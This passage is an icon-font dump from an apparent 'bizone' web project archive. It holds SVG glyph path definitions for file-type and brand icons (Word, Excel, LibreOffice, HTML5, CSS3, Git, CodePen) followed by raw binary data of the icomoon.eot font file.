7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.324-32 32-32h224v-624z" />
<glyph unicode="&#xef2c;" glyph-name="file-openoffice" d="M690.22 488.318c-60.668 28.652-137.97 34.42-194.834-6.048 69.14 6.604 144.958-4.838 195.106-57.124 48 55.080 124.116 65.406 192.958 59.732-57.488 38.144-133.22 33.024-193.23 3.44v0zM665.646 354.25c-68.376 1.578-134.434-23.172-191.1-60.104-107.176 45.588-242.736 37.124-334.002-38.982 26.33 0.934 52.006 7.446 78.056 10.792 95.182 9.488 196.588-14.142 268.512-79.824 29.772 43.542 71.644 78.242 119.652 99.922 63.074 30.52 134.16 33.684 202.82 34.52-41.688 28.648-94.614 33.954-143.938 33.676zM917.806 730.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.886-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.324-32 32-32h224v-624z" />
<glyph unicode="&#xef2d;" glyph-name="file-word" d="M639.778 484.108h44.21l-51.012-226.178-66.324 318.010h-106.55l-77.114-318.010-57.816 318.010h-111.394l113.092-511.88h108.838l76.294 302.708 68.256-302.708h100.336l129.628 511.88h-170.446v-91.832zM917.806 730.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.886-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.324-32 32-32h224v-624z" />
<glyph unicode="&#xef2e;" glyph-name="file-excel" d="M743.028 576h-135.292l-95.732-141.032-95.742 141.032h-135.29l162.162-242.464-182.972-269.536h251.838v91.576h-50.156l50.156 74.994 111.396-166.57h140.444l-182.976 269.536 162.164 242.464zM917.806 730.924c-22.21 30.292-53.174 65.7-87.178 99.704s-69.412 64.964-99.704 87.178c-51.574 37.82-76.592 42.194-90.924 42.194h-496c-44.112 0-80-35.888-80-80v-864c0-44.112 35.886-80 80-80h736c44.112 0 80 35.888 80 80v624c0 14.332-4.372 39.35-42.194 90.924v0zM785.374 785.374c30.7-30.7 54.8-58.398 72.58-81.374h-153.954v153.946c22.982-17.78 50.678-41.878 81.374-72.572v0zM896 16c0-8.672-7.328-16-16-16h-736c-8.672 0-16 7.328-16 16v864c0 8.672 7.328 16 16 16 0 0 495.956 0.002 496 0v-224c0-17.672 14.324-32 32-32h224v-624z" />
<glyph unicode="&#xef2f;" glyph-name="libreoffice" d="M534.626 937.372c-12.444 12.444-37.026 22.628-54.626 22.628h-384c-17.6 0-32-14.4-32-32v-960c0-17.6 14.4-32 32-32h768c17.6 0 32 14.4 32 32v576c0 17.6-10.182 42.182-22.626 54.626l-338.748 338.746zM832 0h-704v896h351.158c2.916-0.48 8.408-2.754 10.81-4.478l337.556-337.554c1.722-2.402 3.996-7.894 4.476-10.81v-543.158zM864 960h-192c-17.6 0-21.818-10.182-9.374-22.626l210.746-210.746c12.446-12.446 22.628-8.228 22.628 9.372v192c0 17.6-14.4 32-32 32z" />
<glyph unicode="&#xef30;" glyph-name="html-five" d="M60.538 960l82.144-921.63 368.756-102.37 369.724 102.524 82.3 921.476h-902.924zM784.63 658.572h-432.54l10.302-115.75h411.968l-31.042-347.010-231.844-64.254-231.572 64.254-15.83 177.512h113.494l8.048-90.232 125.862-33.916 0.278 0.078 125.934 33.992 13.070 146.55h-391.74l-30.494 341.8h566.214l-10.108-113.024z" />
<glyph unicode="&#xef31;" glyph-name="html-five2" d="M60.538 960l82.144-921.63 368.756-102.37 369.724 102.524 82.3 921.476h-902.924zM810.762 97.176l-297.226-82.376v-0.466l-0.776 0.234-0.782-0.234v0.466l-297.222 82.376-70.242 787.486h736.496l-70.248-787.486zM650.754 429.796l-13.070-146.552-126.21-34.070-125.862 33.916-8.050 90.234h-113.49l15.83-177.512 232.076-64.176 231.342 64.176 31.040 347.012h-411.966l-10.302 115.748h432.534l10.112 113.026h-566.218l30.498-341.802z" />
<glyph unicode="&#xef32;" glyph-name="css3" d="M152.388 911.478l-34.36-171.926h699.748l-21.884-111.054h-700.188l-33.892-171.898h699.684l-39.018-196.064-282.012-93.422-244.4 93.422 16.728 85.042h-171.898l-40.896-206.352 404.226-154.704 466.006 154.704 153.768 772.252z" />
<glyph unicode="&#xef33;" glyph-name="git" d="M1004.692 493.606l-447.096 447.080c-25.738 25.754-67.496 25.754-93.268 0l-103.882-103.876 78.17-78.17c12.532 5.996 26.564 9.36 41.384 9.36 53.020 0 96-42.98 96-96 0-14.82-3.364-28.854-9.362-41.386l127.976-127.974c12.532 5.996 26.566 9.36 41.386 9.36 53.020 0 96-42.98 96-96s-42.98-96-96-96-96 42.98-96 96c0 14.82 3.364 28.854 9.362 41.386l-127.976 127.974c-3.042-1.456-6.176-2.742-9.384-3.876v-266.968c37.282-13.182 64-48.718 64-90.516 0-53.020-42.98-96-96-96s-96 42.98-96 96c0 41.796 26.718 77.334 64 90.516v266.968c-37.282 13.18-64 48.72-64 90.516 0 14.82 3.364 28.852 9.36 41.384l-78.17 78.17-295.892-295.876c-25.75-25.776-25.75-67.534 0-93.288l447.12-447.080c25.738-25.75 67.484-25.75 93.268 0l445.006 445.006c25.758 25.762 25.758 67.54-0.002 93.29z" />
<glyph unicode="&#xef34;" glyph-name="codepen" d="M945.75 591.958l-448 298.666c-10.748 7.166-24.752 7.166-35.5 0l-448-298.666c-8.902-5.934-14.25-15.926-14.25-26.624v-298.666c0-10.7 5.348-20.692 14.25-26.624l448-298.666c5.374-3.584 11.562-5.376 17.75-5.376s12.376 1.792 17.75 5.376l448 298.666c8.902 5.934 14.25 15.926 14.25 26.624v298.666c0 10.698-5.348 20.69-14.25 26.624zM480 305.124l-166.312 110.876 166.312 110.874 166.312-110.874-166.312-110.876zM512 582.458v221.75l358.31-238.876-166.31-110.874-192 128zM448 582.458l-192-128-166.312 110.874 358.312 238.876v-221.75zM198.312 416l-134.312-89.542v179.082l134.312-89.54zM256 377.542l192-128v-221.748l-358.312 238.872 166.312 110.876zM512 249.542l192 128 166.312-110.876-358.312-238.874v221.75zM761.688 416l134.312 89.54v-179.084l-134.312 89.544z" />
<glyph unicode="&#xef35;" glyph-name="svg" d="M928 544c-28.428 0-53.958-12.366-71.536-32h-189.956l134.318 134.318c26.312-1.456 53.11 7.854 73.21 27.956 37.49 37.49 37.49 98.274 0 135.764s-98.274 37.49-135.766 0c-20.102-20.102-29.41-46.898-27.956-73.21l-134.314-134.318v189.954c19.634 17.578 32 43.108 32 71.536 0 53.020-42.98 96-96 96s-96-42.98-96-96c0-28.428 12.366-53.958 32-71.536v-189.954l-134.318 134.318c1.454 26.312-7.856 53.11-27.958 73.21-37.49 37.49-98.274 37.49-135.764 0-37.49-37.492-37.49-98.274 0-135.764 20.102-20.102 46.898-29.412 73.212-27.956l134.32-134.318h-189.956c-17.578 19.634-43.108 32-71.536 32-53.020 0-96-42.98-96-96s42.98-96 96-96c28.428 0 53.958 12.366 71.536 32h189.956l-134.318-134.318c-26.314 1.456-53.11-7.854-73.212-27.956-37.49-37.492-37.49-98.276 0-135.766 37.492-37.49 98.274-37.49 135.764 0 20.102 20.102 29.412 46.898 27.958 73.21l134.316 134.32v-189.956c-19.634-17.576-32-43.108-32-71.536 0-53.020 42.98-96 96-96s96 42.98 96 96c0 28.428-12.366 53.958-32 71.536v189.956l134.318-134.318c-1.456-26.312 7.854-53.11 27.956-73.21 37.492-37.49 98.276-37.49 135.766 0s37.49 98.274 0 135.766c-20.102 20.102-46.898 29.41-73.21 27.956l-134.32 134.316h189.956c17.576-19.634 43.108-32 71.536-32 53.020 0 96 42.98 96 96s-42.982 96-96.002 96z" />
<glyph unicode="&#xef36;" glyph-name="IcoMoon" d="M259.544 448.002c0 65.416 53.030 118.446 118.446 118.446s118.446-53.030 118.446-118.446c0-65.416-53.030-118.446-118.446-118.446s-118.446 53.030-118.446 118.446zM512.004 960c-282.774 0-512.004-229.232-512.004-512s229.226-512 512.004-512c282.764 0 511.996 229.23 511.996 512 0 282.768-229.23 512-511.996 512zM379.396 0.718c-153.956 89.574-257.468 256.324-257.468 447.282s103.512 357.708 257.462 447.282c154.010-89.562 257.59-256.288 257.59-447.282 0-190.988-103.58-357.718-257.584-447.282z" />
</font></defs></svg>PK!�DB�v�vbizone/fonts/icomoon.eotnu&1i��vv�LP߁q�icomoonRegularVersion 1.0icomoon�0OS/2e�`cmap�r�x\gaspxglyf_.��=|head�|�>�6hhea
�)?4$hmtx�{t�?X|locaP��Y��maxp��tT name�J	�tt�postu� �������3	@�6���@�@ @ �c�6���� �������� h��797979���%5EQ]!2654&#!"&5463!2326=4&#!"3!2654&#!"#!"&5463!232654&#"32654&#"0�		�@		�			�`$`���	��		`	��



�



@			�		�		��`������		�		��






��@�-1AK7265463!232654&#!""3!2654&#!!!"3!26=4&#!"&=!p			%�$	g		�		�����	6�5	"�`!�	��		�'$�	�	�@		�	�@��	&.5 	0"
����(8<LV7!326=!2654&#!"463!2#!"&57!2654&#!"!!"3!26=4&#!5463!200		0��	�		��	P		�		� @%	�	% �``�0		0��@�		�@		0	@		��	@���%0		.&B �� �/3?!2654&#!"463!2#!"&57!2654&#!"!!32654&#"0��@	�		�@	P@		��		 ��



@��`�		�`		p	�		� 	�@`


��`�/3?M!2654&#!"463!2#!"&57!2654&#!"!!32654&#"32654&+"0�			�	0�		�@		��`�



0�		�		@��`�		�`		p	�		�`	���`


				���&,>LZhv�!2650450&54&'8581.'*1&"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"0���@�̼� 	��	�`	��		�`		�		�`		�		�		�		�`		�		�`		@� �`���	�%�p						�								��				�				��@� &9GUcq������7!265<14&14&/.#0&#0"#!"3#"&5%463!;#!"&5!2654&#!"!2654&#!"32654&+"!2654&#!"!2654&#!"3;#!"&=4&#"3!265<14&14&/.#"4#0"+"3"&=32654&+"32654&+"32654&+"32654&+"0@������	�`	p�	��
p�		��		�		��		�		�		�		��		�		��		'��	��
		@��		�	���		�		�		�		�		�		�		�		@`���I�	�	���		 ��				�								��				�				`���		 		 `�		�	���				�				�				�				���AMS���!26=041>7326764/>54&'04150450&54&'8581.'*1&"#!"3#"&54632#"&5%463!;.#"!"3!!"3!!"3!2033267#!"&532654&+"!2654&#!"0��$5+��@gIIggIIg��̼� 	��),M��		1��		��		HN,)	�`	��		�		�		�`		@���N-7\P �`�IggIIgg���	�%0"		1		1		#�		�				�				����-O_iw���!2654&+";2#!"&546;2654&+"2654&+"3!2654&+";!!26=4&#!"'!#!"&5!2654&#!"7!2654&#!"!2654&#!"!2654&#!"0 �		����		��		@		�		@		0���@#	�`	#���`		��		`		��		`		��		`		��		@�		���		��`			�					� �@#�		�#����				�				�				�				��>�+/?CQ_m{������%2654&#"#"&54&#"!2654&#!"!!!26=4&#!"7!!!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!2654&#!"!"3!2654&!2654&#!"!021812654&#"#"&54&#!"!0!"&5�#					(�@		��		 ��		�		� �		@		��		@		��		@		��		@		��		@		��@		��		��		@		��@		��		A\L66L�]A�		�[6L #P		��	P		��  	 		��	 ��	�		�	�`�				`				`				`				`				 				@				 				�]AP��6LL6P��A]�

L6B	��`�'1?M[iw��2654&#!"326=46;#"&=4&#"3!2#!%4&#"32632654&+"732654&+"32654&+"32654&+"732654&+"32654&+"���		��		���0@				���		�		�		�		�		�		�		�		�		�		�		�		@�%		%�`		���0@		��		W				�				�				�				�				�				�� �-=KYgu���������!".#!"3!2673!2654&!"&5463!2%#!"&5463!2"32654&2654&#"!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&!"3!2654&��

�

���H�P				��				'��		�		��		�		��		�		��		�		��		�		��		�		9��		�		��		�		��		�		��		�		��		�		��		�		�����@����	��		@	��	@		��	�				�								��				�				�								�								��				�				�				��@�-7GKYgu���"#!"&54&#"3!2654&!"3!26=4&!5463!22654&#!"3!!!2654&#!"!2654&#!"!2654&#!"32654&#"32654&#"32654&#"0		� 			�	'� 	 	�	�	�		�`		���0�		� 		�		� 		�		� 		��



�



�



�	��		�		���	@�		��		��			�	� �				�				�				�










	��@���������4&#"#!"&54&#"3!26";326=3326=3326=3326=32654&+532654&+54&#"#54&#"#54&#"#54&#"#";%#5##5#3#32!546;2654&+"3!26=4&+"#2654&#!"354&#"32626=4&#"@			� 			��P		0		�		�		�		0		00		0		�		�		�		0		0�� �����	�		�	 	�		�		��		P								`		��		`		��		p		pp		pp		pp		p		�		�		��		��		��		�		����������			�		�						0�		�				�		�	���� �+Y{"3!2654&#"#!"&54&%!"3!2654&&"?326?326=4&5.'"&+";?32676&/>=4&#"	�			��		���		@		�d�
���		�		y��
���		�`	�� 		��		 	`				���
���y		�		��qq
tS		St
���+7Gdx!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>3281!'.#81"'&!0��`	�		�`	p&&&&


�
�		� 		��|Z�@�Cp�-��@��`�		�`		@&&&&`



�	�		��	 ���ub}`�LI		j���� �+7Gat�7!2654&#!"463!2#!"&52654&#"72#"&546!2654&#!"75625762326?>32!'.#81"'&""3!2654&+";2#!"&=4&0@��	@		��	 &&&&


�=�		�@		��|:�`�#p�-�	@				��		@ ��P		��		�&&&&`



� 	`		��	 ���uB}@�m(		k����	@			��			����(ADR`n|���������#"3!2654&#46;#"&!+32&"3267%>54&'%#";2654&'32654&+"#";2654&#";2654&#";2654&#";2654&#";2654&32654&+"732654&+"32654&+"32654&+"32654&+"32654&+"#";2654&�@����������Y	 ����@		@		G@		@		G@		@		@		@		@		@		@		@		@		@		Y@		@		@		@		@		@		@		@		@		@		@		@		G@		@		��`��0��@��@��`���������D�				`				�				�				�				�				�				`				�				�				�				�				�				`				��@�H\����#"&=4&#!"+";2654&+"&5!32>54&'!+";2654&".54>32".#".#!546;26=463!2;226=4&+"326=46;2"32>54.".54>32��.A?��F:0�!//!�		�Aq�VV�qA�		�!//��O�i<<i�OO�i<<i�)L`o<<o`L���9(+5?2.'9��	�			�		w<hO--Oh<<hO--Oh<5]F((F]55]F((F]; BC >/!��!/		�%P+V�qAAq�V+P%�p		/!@!/��<i�OO�i<<i�OO�i<@3S;!!;S3�G -0 G�	  		 		 	�-Oh<<hO--Oh<<hO-��(F]55]F((F]55]F(��@�SWay��#54&+";2#4&#!"#546;2654&+"#";2654&+"&=!+";2654&!!463!2"!54&#"3!2654&732654&#"32654&#"P@		@	�	� 	�	@		@P�		�		�		����@��	�	��	�@			�		�



�



�p			p0		��p			p�@			pp			� ��0		��@	��		�			�






��@�7AKi"#!"&54&#"3!2654&!"3!3!26=!26=4&#!"&=!%!5463!2"326=463!2326=4&#0		� 			�	'� 	�`�	�<	��	���	�	��			`			�	�`		�		�`�	@�	pp	���		p �		�		�		�		�����;Nav"#!"&54&#"3!2654&26=4&#!"326=463!2!"32>=4&#".=463!2267265.#"'&�		��			`	�y	��			`		g��h��ts٩g^��qsѡ_	`	��.	1\1
	3�	��		�		���	�	``		`		`	@�!I>((>I!��<8''8<�		�0
	
����&��26=4&+'.3:7%7>/32"32#!"&=46;26=4&#!"&546;3:7%>'.0"#!"3!26=4&#"#!"&53!2#"3!26=4&32654&#"	V�/�+K
�		��	�0""�`	C�}�+55+�		�0"!���



�	5:��4	5	�		��	�"" �5+�@+5�		�"v
����


��@�+AW���"3!2654&#!"&54&!"#!"3!2654&3!232654&#!"%"3265463!2654&#!>764'&"4&#".'.7>7>'.!"3!3267>732653267>76&'.'!2654&#%>32>"'&47>70	@		��		�		�`		�	�)	�			�`	�			@		��s
$$#j#
		)r

$		S'�n		+	$$--
		)q
$		R'�		��
""
r&bNr&�	��			�		��			�	�		��

		��

			�a	%f%##				�Y=* 
*76	

%f%	��		
>* 
*75
	�

L-l��L-l����/@P`#>54&+"#>54&+"3!2654&+"#"&546;2#3"&546;2#+"&546;2@f�f� ��`p		�		�		�		�	�		�	p����``����\	`		��		�		�`	���		�		����CGWg2654&+54&#"!54&#"#";#";3265!326532654&+!!4&#!"3!26%463!2#!"&�		�		��		�		��		�		 		�		� �� `����@	�		��	`		�		��		�		��		��		��				 �� ����`�		�`		���%GT4&#!"3265463!2#!"3!26"3!265732654&#!";#!"&5463!�`			�		��		 �0�			�		��		�		���		 		�`			D���					��			��@�+AWgk#"326=46;2654&!#";2326=4&"+";26=4&!";2654&+"&=4&%26=4&+"373#�			�		��		�					�		�	��	�		�		�		�		����		�						�		��	�			�		�			�	�	�		�	�����BFLQ[e!2654&#!"463!2#!"&57:3%267>5764/&"013'#5%';62'0��`	�		�`	`@Cu�)x��e�"��7KN��I���$�@	T��W��l�@��`�		�`		A`Fu*�x����v!��
&M��K���@%�V	FQ��l��� �+7CO[gu���!"3!2654&#!"&5463!2"32654&"&54632"32654&"&54632"32654&"&54632'2654&#""326=4&"32654&2654&#"�`,,�,,�`��&&&&


�&&&&


��&&&&



								�				�				�,��,,�,�@�p&&&&`



�`&&&&`



&&&&`



�	 		��	�	`		`	`	�@		�	��	�		�@	����EU_"3267>767>54&#"'.'.#"&'.54&#%54&#!"3!26'!5463!20		#hhXVef#
		
%smORpu%
	P��	`	 ��	 	�	�bO_YY_O	�		�b_jUUj_�	P��		�			������47o�����4&#!"3!26554&#!"3!26=4.'>!#0&1'54&#"01#54>7>54&'.=!7!"3267>7>764'.#.'3!2654&#!"3"326=4&'"326=4&�
�~

�
!	��	(;CE:&	@	)<CE:&����D@.I�		�I*=ED@. *=EZ��P,'L�$?�<���

�~

A								�				�t		t;dP;<Pa:t		s;dP;<Pa����6Ld;c�		�d9`L85Lc<dd9`L8�1B	>+	�3!.��				�	 		 	`	 		 	
����2;?CGKPZd"#"3!2654&+54.4>32#54&#"#)54632#7!#7!#73#7#53!"&=!!5463!2�BuW20!//!�!//!02Wu��-Oh<<hO-`qOOq`���^BB^נ��R���R����ɠ��	��� @����2WuB`/!�@!//!�!/`BuW2��<hO--Oh<``OqqO``B^^B��������������PP����
Yd|�"32654&&"#!";32654&#"&'.'332654&#"&'.'323267>54&'46;#"&5.+"&#81"+!2>72654&#"�				@	$b��z�D#11#m/$`=		6U(`3 		(�z��c$��ll@&g��{�k0{��f%�p				�	� 		�	'F=*2$��#1n/$$		(a4		'
*>F
��{V�@�G=)�)=G��	V		��	��`�I"676&'.5>73267>54&'.'&4&#�k�j6Rrz(
0vhG8`�X	��u-Y�Y
KuR1`�� 	�3>5��f�zSQs�\;	13*�0		H��|@-84		
*0+��k�yK�	��/�
iv��2654&#!"3!"32676&'.'&67>;326=4&5>5323267>76&'.#.5!"3!26=4&#!5463!20		��		 ��OQ
+4631)
M60DXU		_cM06M)3476+QOPI^YOS@�@%	�	% �``�				 -K) C?52;?";��Q[7P		P	7[Q0;">?6:BB)K-��IuU44TuI0��%0		.&B ��n�o}!"3!23265..#!!2!0&'.54&#"30:1267>'.'>76&'.#!"3!23"#4&#"326���		`*		!
��P"k�E		&���	%-)

),&	��

.1''2-��				�	� 	"		�;��-��
			AB9
AKH			SR=
4HK���		� 		���Xr���833:7%23267201%>'.'&"?.%54&#"6&'&%676&/&"3267>54.#"2.54>4&#"326"&54632(\\ ��
���==��		��=
=���
�� ]R`O*Id99dI*O`R3X@%=QPOQ>%@X�T<<TT<<T�.BB..BB>^^�
0Y
O���
�VX

XV�
��O
Y��
�S��Y9dI**Id9W��T�%@X3I�yWYx�H3X@%�<TT<<TT4B..BB..B��`�z�4&#"#"3267>32#"&'.#";>54&'.54632326=>3232654&#"#"&'40154&+8#.5467>5:;23267>32#"&'.#"+.5467>54&#"#"&=>3232654&#"#"&'546;029>54&'.54632�MTJZ	
�8U)GH'V7�
G<;G
~4A

" 5XP0 (	
B3~	5~*+!	,4E(	!),~
	NTIZ	�)D	
' 4[\4 &	F'�
I;;F
C/NE8!"
M3w
	B>?P	�6S	*33*	I9�OMSM
s:L
"!8
@&t 	F:@<
�$>	
"!.OE8!"
	A(�
aNNR	
w*6
	*33*	��@� .?M_p����!"3!2674&'.#!"&'!%2654&#"#023>'.!2654&#"3:12676&'&267>'&"&32676&#";2654&!2654&#!"!32654&+"�`�`����{w{��				�	 
	 	�				�	 	
 	���
0��
�� �		�		�y		�		�g�		�		�	#$���L	 		��	
 	
��	 		��	 
	��

`
��|��
`
��				 								����?ES&"3!2654&'>7>323267%&"32676&'%!62%!2654&#!"�(��Z��'�q���
*����q'3���a 		��		�

����^;�����i
	��9�
�L�Hc�				����
3BYe4&#"32654&#"3263!26=4&#!"01!"&/7>3.#!"3!26?>54&'%!2#!5�				��rp
�

�E
��Eqr��
�E

�
r���qr�D00	��		�"		"		6ZX	�	�WZ�Q	�	ZHWZ���_�38FPb��.'&"3:?3:373:7%>764''7%'81'81'7%'041/%.3263>'#"326?3326=33267>/54&##546;2o����0������$�.�:�L�Xa��5����`%��I		I��% �`v�yosVC����WioQ;�o�?(3��vB� �j%*�
��		��
�(&` ��@��2>J����?>03261>?>?6326?>/.?>?>70654&1././&6?6&/././.'0&#"1&/&01'46146?>?6&/&4?>?>?>30632126?601#"&#'.#0#"&1"&/./.#"&/.?>/./.50&52654&#"2#"&546+"012?201:326?46?2?>/46?>3267067>16&/"&/46?>/."&/.754&'0&'.1*#""&/.7>/<1732637>?>30301?:121001#"1/.#"##10&'.#0&156&/.#"*3'0617>/4&/.5067>506132672654&#"72#"&546v
-	&
I
	


	I	&	-
S

S
-	&
I
	

	I
&	-
S

SVT-%	I	I	$-
TT-%I	I	$-
T�IggIIggI<TT<<TT<

4*
:

	
) 	<

4*
:

	
) 	
*	
		9*
	4<

*	
	9*
	4<
�(88((88(&&&&		I
&	-
S

S
-&I
	


	
I
&	-
S

S
-	&I
	

WI	$-
TT-%	I
I	$-
TT-%	I
�gIIggIIg@T<<TT<<T&

	)
 	;
	4*
9

	)
 	;
	4*9
8*	4<

*	
	

8*	4<

*	
	
�8((88((8�&&&&���Ew��267'32>54&'7>=3023>75323:7>5<=4&+".#"3267>;2#"#"#".54>2654&#"72#"&546�k���JtQ+�``
|	�Z*CwY33YwC'�|	p	p	�&IiB=kP..Pk.BB..BB.!//!!//�=��
��5Vm8 BI�
����3YwCCwY3lw	�	�	�LB&2bM/.Pk==kP.�4B..BB..B�/!!//!!/-��>�X267>54&'&67>'.7>7>3201227>54&'.#0"1"3�0b$*z+�b�!\!��+�5jJ**I�#� U11V��!!8<-%%55*+�O�! ))��+05<! ?sI+*J��V11V !�� LMI������:r�2326?>54&'.#"01"7>'&6?>32'&>'.#"&'.546?>656&'&302126?&"326764`6�45��)(�0	|	�)(�0	!@�56���P���65�F$6�()�	�I&8�()�	�65���P�
��@�1=Iav��!"2?>3!2"/&"3267>54&#4&#"326'4632#"&%"3267>54&#!"'&47>3!2"32654&"&54632��%*
*
@	�=U
U	
�/%&&%`



��%�@
N

���Q�>���
@�&&&&


�++	��	�AU
U�&B�&&&&


-�<(���&B0��	�AM�	0&&&&`



����q��"0232676&'%.75045.'.'.54>32"&"1'&27>75<54015467241>54.#2676&'%&:&:32676&/`?~e>?>-��0999[r:;sZ8J'1��
	-@?=d~A�	���	��1[�RP�31%	98
/40zHJwS,,RwK_r!5/ 
%15�RS�[0�P::/.���2d�%&"3267%>54&"'%.5467%>32&"'%.5467>'.3267%>54&'&"'%.5467>'.3267%>54&'��&o&��q00q&��^��r((r
��[��
q00q
��[��
q00q���! �

� !T��	�				�	{
		��		
! �� !�	��	 !��! ���?DINWe3!:7>781401>7<14654&5405.'0&#'&"3!"7	777326=7%46?>'.5	�e��w)�u#��	����%�N��!7XT
@W��U�l�l/	6$x�

u��@
��@$�%�N�Kd�!��
�	V��Q��l�l����E�������0326764'.'764'&".'764'&".#.?>02764'.#&&".'&"33126?>/&"#81"&'0&'764'&".'764'3:3%267>57>54&/&"01'#5	';62'7 7M-23%st�
5L.
.K61��3

-J5
����tt%3�J@#u�*x��e�!�7K�M�	J|����H@	T��W��k�l26K.

33%tt�
!:N/
.N:!���3

,L8 		�,���ut%3�`&u

�x����R!�
&�N�Kl��@�zV	FQ��l�l����M����>5.'&.#"26?>3267>'3267>'.'""/&4?2?#"&'&'764/&&67>3267>'&67>"'&"38126?64'&"'&"326?326764/764''7�7x+(�� )L*p1o*&E(q )L*p0p�0*]@#
��$ V)^1*]@#
�# V)^���A
-��@-�`@`��KI)I�+)u6��+v7p2p
	)u6q,u7p0p�0_*T ��
.j$ 
_)3_*T �
.j$ 
_(��@��0(@��0p`@`��4I)I	���=Vbn���%2654&#"72#"&54632>54.#"&'4&'.	32#"&'.54&'.'32654&#"#"&546323267>54&'&67>'.#"3267>5467>764'&"#"&5463267>7732654&#"0.BB..BB.!//!!//�\D,N:" 9O.jR�
Ej}9<S�.�aqOgkK:L	ZB3tcF%B..BB..B�/!!//!!/t*WF,	��
@-AN��2.O9 ":N,D\

	 L:KkgO$:
� B..BB..B�/!!//!!/#N<<":N,,H5Lt��m,0M$�
S^IKk23G$/X3)b~�d�
.BB..BB.!//!!// 
'az�^��
VO�kU�	5H,,N:"<;_ 2J31kKI^
>

����6;E|3267.#!";21'"32654&'4&'.'.5463!!5!2!>830#"&54674016417>54&#81#"&'5!+"�$$��$$�	:
6,,7#*�3���!>��d%%G���<1 $&$$��$#?@

4??4		
6G"~~b��%��55GD0!CC9M=���3J^r�"326733267>54&'.'4&'>54.	"'.5467>32%".54>32"32>54.".54>32PE{[55[{EAt-E			

		

	��,E)/5[{2		����?oR00Ro??oR00Ro?2WA&&AW22WA&&AW2+L8!!8L++L8!!8L�5[{EE{[5/)E		��	

		

	E-tAE{[5�f��		0Ro??oR00Ro??oR0 &AW22WA&&AW22WA&�@!8L++L8!!8L++L8!����_��26=326=4&+";'3#326732673267>'>764'&"'>54&#".'&"2326762#".'&47>374632#"&53267#"&'p			@		

  ���/e56e.��,D
LK54KL
D,�c
-u@At.
)DKP*)QJD	�8'(88('8,
K@"!@	0	`		`	0	�@�f��
!B	�35JJ53�	B!��
�-11-(..(�(77('88't���@�HT`lx".#"%>54&#".#"32654&'326732654&'32654&##"&54632"&54632"&54632"&54632�(8��	
$
��8((8�	
(88((8�	$
"8((8	
(88(��&&&&&&&&�&&&&f&&&&�8(%
�?�	
(88(%
��8((88(%
`�
(88($
�8((8�`&&&&�&&&&��&&&&`&&&&����7AO]7#"3!26=4&+5>=4&#"#".=4&#"!546;2"326'6&#"&54632�_%	@	%a0R=#

!8K++K8!

#<R/�����<UU<<UU3A..CC..A��%0		.&�)AU0<

<+L9!!9L+<

<0UA)� �V=��=VV=|=V��/BB/|/BB/����
��4&#!"3!2667>772013!2654&#!.5467>54&5>7>'.&'&""'.'&67>764'4&'3223267>54.#"&5.%.#"32:3267>54.�	��		@	�i
.7
))A;A�		�F=5F/



	!
C!
$
	SSQ-_X?Lgg<e	
OC'[>		9R#:/	!3>0				�'1%	(B=6�A+H		:"9|1AQ6@ 
*
/(H{)!Al7[wABz]:z�G=?l:�		9RoG#k^bn$MvY>
��V�
1Ng2654&#!"33!2676&''.=4&+"##!"&'&6713267>3253.#"#"&'#74>0		��		�,2�2,�	�	�&��&
�4--4-&�
��8-4-&', �				��%0

0$>3FS'�		�*ZK1��T

"

��"���D�%3O`��M�.<HT.#"3!832676&'#!"&'&67>322654&#""32654&"&54632�F''F�xN3
2N�xw@*��*@�88��				&&&&


a.11.�\/\&$(($%].���L'�&))&�['K$	@		��	P&&&&`



����A��6?>32'&:3267021061263461647<124176&'&.#"4&+"&'&673263>/4&1&4#.#"4181.#0"1*#?;265%6&/.#764'&"01326764/%267�b
c11�~� �@$$@E	�%9�4@�~�G.�	�@B9%��E`_DI.Hk�
�"$$"�� �v-)-,)��	D#4�� ��+U"!%
6"T)��#CF`^D$!��]�my732>=326764/.#"#"2?!2654&#!5>54&#"!"3!.=326764/.#"272#"&546FM��[[��MG`aGDs�R		��)7B..B7)��		R�sDGcb
!//!!//cF[��MM��[G
`a
GS�vJ_		�>*.BB.*>�		��Jv�SG
ba
=/!!//!!/��{��67>7>7>74&'.'4&'.5467>5>30213:7>'.'.'.'>7>54&'.'#":GLD7#;
,G^66^G*B)7DJG9	ANQ-6
)C

0Oi<:hO2:$	7-ROA?.=&V#Z57
=jO./Pm>.=g!	#U%;-5D);'#j>7
CuW31UsBA5[!';,E5��{��"3:7>'.'.'.'67>5.'.54.'0"#81"767>7>7>74&'.&'>54>3021'�7DJG9	ANQ)5sk!$+Lg;<iO.$!�Z4(
ROA:GLD7An ")F_65[C&" dS)#U%;-5D)5#	;MWRDxY44XuCRWMF!2,E5.=&U#$QWR<jO/.Pl?RWQ

